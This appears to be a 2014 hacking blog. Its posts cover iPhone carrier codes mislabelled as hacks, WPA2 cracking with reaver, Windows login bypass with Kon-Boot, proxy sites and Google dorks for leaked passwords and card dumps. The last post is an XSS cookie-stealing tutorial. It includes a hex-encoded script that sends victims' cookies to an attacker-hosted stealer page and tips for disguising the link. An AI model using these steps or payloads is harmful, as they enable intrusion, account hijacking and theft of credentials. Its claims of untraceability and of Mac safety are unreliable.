Thursday, February 27, 2014

Secret Hack Codes for iPhone 4 or 4S



Hello friends, today i am going to share all the available secret hack codes for iPhone 4 or iPhone 4S. These secret hack codes will help you to hack the iPhone and helps you to explore the internal settings of your iPhone.

Secret codes are actually those codes which are not known(hidden) to general users, usually Geeks use these codes as their shortcuts to browse the internal settings and perform their exploits. As we all know iPhone is quite secured and there are very less hack codes available for the same but don't worry Guys i come up with all the available hacking codes that works on iPhone 4 or 4S.  You can also try these hack codes on previous models as i have tested them only of iPhone 4 and iPhone 4S. Some of them works on iPhone 4 and some on iPhone 4S and some are specific to operator. So please don't complain if any of them didn't work for you.. All codes are tested personally and are 100% working..

hack codes for iPhone 4, iPhone hacking codes
Hack Code for iPhone 4 or iPhone 4S
Note: Some of codes will require tapping of call key on your iPhone, actually most of them require call button + tap(means slide it). So if any code doesn't work just by dialing, you just need to tap the call key and it will work. Infact except the IMEI number one hack code all require call + tap.

Secret Hack Codes for iPhone 4 or iPhone 4S

*#43#  
Use to verify if call waiting is enabled

*#61# 
Verify the number for unanswered calls

*#62#  
Verify the number for call forwarding if no service is available.

*#67#  
Verify the number for call forwarding if phone is busy

*#33# 
To verify whether barring is enabled or disabled for outgoing

*#21#  
To display the settings for your call forwarding

*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.

*#06#    
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.

*225#   
Displays the account balance for postpaid contracts.

*777#    
Displays the account balance for prepaid accounts.

*646#    
Displays the remaining minutes available.

*3282#    
Get your data usage information.

*729    
Options to make payments. Its operator specific.

611    
Dials customer service, (114 in RSA for Vodacom). Its operator specific.

*#30#   
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.

*#76#   
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.

Note: This is the list of all iPhone codes available till now in market. If hope i haven't even missed the one. If still you are able to find any extra hack code for iPhone 4 or iPhone 4S then don't hesitate in sharing, as Sharing is Caring.

So friends, that's all for today, I hope you all have like it.
If you have any issues or concerns please share it in form of comments below. If you like our articles so don't forget to subscribe our articles, its just for you only so that you will not miss any of our articles...
Thanks for reading...:)

Tuesday, February 11, 2014

5 Steps Wifi Hacking – Cracking WPA2 Password

                                                                Wifi Hacking Tools


1. Open our terminal (CTRL+ALT+T) and type airmon-ng

this command will lists our wireless card that attached with our system.

2. The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0

3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.

From the picture above, we can see many available access point with all the information. In the green box is our victim access point which is my own access point :-)

Information:

BSSID (Basic Service Set Identification): the MAC address of access point

PWR: Signal level reported by the card.

Beacons: Number of announcements packets sent by the AP

#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

#/s: Number of data packets per second measure over the last 10 seconds.

CH: Channel number (taken from beacon packets).

MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.

ENC: Encryption algorithm in use.

CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH: The authentication protocol used.

ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4. From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not.

wash -i wlan0 -c 8 -C -s

If the WPS Locked status is No, then we ready to crack and move to step 5.

5. The last step is cracking the WPA2 password using reaver.

reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360

Because we already get the information from step 3 above, so my command look like this:

reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360

it took about 5 hours to crack 19 characters WPA2 password  from my Kali virtual Box, but it depend with our hardware and wireless card.

Hacking Tutorials Log in Windows Without Password with Kon Boot


                                                             Kon boot

1. First, we will make the bootable Kon Boot by using the default kon-boot installer that already provided when we buy this program, but if we use the free version, we can create the image by following the tutorial how to create bootable usb.

Choose the USB we want to use to install kon-boot from the "available USB drives" drop down list and click "Install to USB stick" when finished.

The installation process will take approximately 1 minute.

note: Make sure you choose the correct USB, because the installation process will erase all data on your USB device.

2. The Kon-boot USB now ready, we need to configure the BIOS settings to change the boot order to boot from USB. You can view our previous tutorial about changing BIOS boot order.

3. This is the preview when we successfully boot from Kon-boot USB.

4. After the Kon-boot initialization screen, it will normally boot the Windows. When we press the SHIFT key 5 times (sticky keys), we can see the command prompt pooped out with system role.

5. We can enter Windows without a password, just click the arrow and we already inside the system.


Tuesday, January 21, 2014

Top 10 Proxy WebSites To Unblock Any Site


If you do not want to go through installation of Proxy softwares then anonymous browsing with proxy websites is the best option for you.
best free Proxy websites of 2014 that will let you surf internet anonymously and securely.


1. 000FreeProxy => 000freeproxy

2. kkProxy => kkproxy

3. MyAddr => myaddr

4. RX Proxy => RX Proxy

5. AnonyMouse =>anonymouse

6. Zend2 => zend2

7. NewIPNow =>newipnow

8. KProxy => kproxy

9. Mega Proxy => megaproxy

10. AD Free Proxy => adfreeproxy

Protect Your Computer,Laptop,Mobile Phones From Hacker viruses and Trojans


1) Windows Updates: Even the best offerings from computer giants have not been able to completely fight off the attempts of rouge developers to break in. In this situation, it has become almost a necessity for users to update their Windows-based system, on a regular basis. An update daily, weekly or even monthly is going to speed up the system and help it counter attacks on its security thereby decreasing the probability of  it, being infected by worms and viruses. Desktop monitoring by hackers is indeed a grand problem.

2) Software updates: Like the Windows, applications also have to be updated with the latest version. You need to check regularly for wear and tear in the software that your system runs. Web browsers and web-based programs have to be upgraded constantly so hackers do not get their hands on the private and confidential data, stored in your system.

3) Antivirus Software: If your system is being connected to the internet regularly and you run without antivirus software on it, it is almost impossible for hackers not to get attracted to it. In case you do not have antivirus software, get your hands on one as soon as possible. If you already have one, upgrade it to its latest version and check if the settings are properly defined.

4) Anti-spyware Software: Even though the digital situation looks pretty grim, it still isn’t as bad as the days when Bonzi Buddy and Cool Websearch made PC users have nightmares. This is because of anti-spyware software that have shielded the tech world from malicious attacks on the security.

5) Swap your Windows-based system for a Macintosh: The whole tech world knows that Mac’s OS X has the largest number of limitations as compared to other computer operating systems. The truth is that most hackers do not bother breaking into a Mac. This is the reason Mac still makes space for itself in the list of secure computer operating systems, despite its shortcomings.

6) Hacker-Controlled websites: Usually sites that offer free downloads,online games etc. are operated by hackers. It is almost given that you avoid dangerous places especially if you have valuables on your PC. The same goes for the mechanical world. Steer clear of sites that look suspicious or require you to download something which is not needed.

7) Data Backup: Create a backup for all the important data that you have on your system. Apart from hackers and system crashers, other mishaps may spell out death for your hard drives. A tech storm can easily sweep away every bit of data in your system. It’s always better to be safe than sorry.

Google Hacking – Using “Google Dorks”

This article is about Google hacking with the help of the dorks, I’m sure after reading this you will thank me for the particular info which I am going to provide you. The best part is you cannot be traced! Those who are new to the phase “Google Dorks” let me give you an introduction to Google search engine and Google dorks. Google is the most used search engine in this world because of it’s most efficient response.  Google has some bots which crawl all over the net and copy almost all content available on databases to Google’s database. Therefore, it gives you the response when you type a word on Google search, it just checks its database and gives the response as you desire!

For making response more efficient Google has provided few functional words called dorks. Here is an example of how a dork looks like: “site:“. This particular is used for finding out the websites with a particular word in their domain name. Such as if you search in Google as  ”site: uk” you will find the sites which belong to United Kingdom (U.K.) only! This makes your search response very accurate when you are searching something, especially related to a country.

Suppose you want to find some information regarding a site then you have the dork “site:example.com”. Just replace the example.com by the site whose information you need to know! And the most good thing is you can use several dorks at a time to make your result even more accurate.

You might be wondering why have I called this article as Google hacking when this a just a simple technique to make the Google response accurate. Actually you know the answer, I have told you in the starting itself…. Yes the Google bots I’m talking about! What happens here is the Google bots copy almost everything available on internet, that is they even copy sensitive information like usernames, passwords and credit cards numbers etc…

And other shocking thing is that you can also access unsecured webcams using Google dorks!

Isn’t that what you actually looking for?

So now you will definitely ask me how to get them?

The answer is dorks, we are going to use some best dorks available and extract the sensitive juicy info from the Google’s database.

Here are few examples of dorks with explanation which will help you finding some sensitive info:

Dorks for finding usernames and passwords:

auth_user_file.txt                                                        Gives you list of crackable passwords

“login: *” “password: *” filetype: xls                                    Gives passwords file in saved in excel

filetype:log inurl:”password .log”                                        Clear text password files

Dorks for finding Credit cards:

“ATM PIN” ReZult                                                          Credit card dumps by phishers

Dorks for MYSQL dumps:

?intitle:index.of?”.mysql_history                                          Gets you the MySQL  history files

Input validation vulnerabilities:

intext:”Powered by X-Cart: shopping cart software” -site:x-cart.com

These were just simple dorks which will get you some juicy info, but there are thousands more which will give you access to very confidential data.

Cookie Stealing with Cross site Scripting Vulnerability

Xss- Cross Site Scripting Attack

Hope, you are now familiar with XSS vulnerability (if you don’t know what it is, read the beginners xss tutorial). It is my Fourth article about the XSS Vulnerability Testing(PenTesting)..! Today i am going to explain how an attacker exploit XSS vulnerability and steal cookie from users.

Warning!!!
Deadly Hacker does not take responsibility, if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting, investigations by legal security agencies.

Requirements:

A cookie Stealer code : Get it from here
Free Web hosting service
Basic Knowledge about XSS
Basic Knowledge about Computer Cookies

Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Step 1: Creating Cookie Stealer PHP file
Get the Cookie stealer from the link i mentioned. In that post, i have explained three versions of cookie stealer. We are going to use the third version.

Copy the code.
Open Notepad and paste the code
Save the file with .php extension
Eg: Stealer.php

Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.

Now you will have two files;
1. Stealer.php
2. log.txt

What these two files do exactly?
The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
The log.txt has cookies , ip address details.

Step 2:
Register in a free web-hosting service and login into your cpanel.
Now open the File Manager in cpanel.
Upload the Stealer.php and log.txt to root folder or public_html folder.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So Far , we have sharpened our saw. Now we are going to use it.
Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.

//

For example:
hxxp://www.VulnerableSite.com/index.php?search=//

Cookie Stealing with Non-Persistent vs Persistent XSS:
Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it. It will be shown to all users. So attackers don’t need to send any link to others. Whoever visit the page, they will be vicim.

Non-Persistent:
In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most of sites are vulnerable to Non-persistent XSS .

In Non-persistence, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=//

The above link is clearly shows the scripts. Hackers can Hex-encode this script so that victim can’t see the script.
For Example:

hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim follow the link, his cookie will be stored in log.txt file.

How to be Secure from this attack?

Use No-Script Addon. This is best protection to stay away from XSS
Never Click the Shorten url
Sometime you may want to follow the shorten link. If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)
(Later We will cover security tips for site admin , so stay tuned)